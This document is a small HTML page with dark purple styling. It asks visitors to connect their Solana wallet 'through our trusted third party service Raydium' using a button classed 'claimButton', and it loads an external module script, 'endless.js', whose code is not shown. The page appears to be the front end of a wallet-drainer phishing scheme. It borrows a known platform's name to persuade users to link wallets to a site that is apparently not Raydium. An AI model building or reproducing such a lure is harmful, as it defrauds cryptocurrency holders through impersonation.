<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connect Wallet</title>
    <!-- Import Google Fonts -->
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;500&family=Poppins:wght@400;600&display=swap" rel="stylesheet">
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #0b0015; /* Dark Purple */
            font-family: 'Poppins', sans-serif; /* Modern Font */
            color: #EDE9F6; /* Soft Light Text */
        }
        .container {
            text-align: center;
        }
        img {
            width: 150px;
            margin-bottom: 20px;
        }
        h2 {
            font-size: 16px; /* Adjusted font size to be a bit smaller */
            color: #EDE9F6;
            margin-bottom: 30px;
            font-family: 'Roboto', sans-serif;
            font-weight: 600; /* Makes the text bold */
        }

        .btn {
            background: linear-gradient(135deg, #763BFF, #5B00A6); /* Dark Purple Gradient */
            color: #F0F4FD;
            border: none;
            padding: 15px 50px;
            font-size: 18px;
            font-family: 'Roboto', sans-serif;
            font-weight: 500;
            cursor: pointer;
            border-radius: 40px;
            box-shadow: 0px 8px 20px rgba(0, 0, 0, 0.4); /* Deep shadow for 3D effect */
            transition: all 0.4s ease; /* Smoother transition */
        }
        .btn:hover {
            background: linear-gradient(135deg, #5B00A6, #763BFF); /* Reverse gradient on hover */
            box-shadow: 0px 12px 24px rgba(0, 0, 0, 0.5); /* Deeper shadow on hover */
            transform: translateY(-7px); /* Lifting effect on hover */
        }
        .btn:active {
            transform: translateY(3px); /* Button press effect */
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.3); /* Smaller shadow on click */
        }
    </style>
</head>
<body>

    <div class="container">
        <img src="image.png" alt="Wallet Image">
        <h2>Connect your Solana wallet through our trusted third party service Raydium.</h2>
        <button class="btn claimButton">Connect</button>
    </div>
    <script type="module" src="endless.js" defer></script>
</body>
</html>
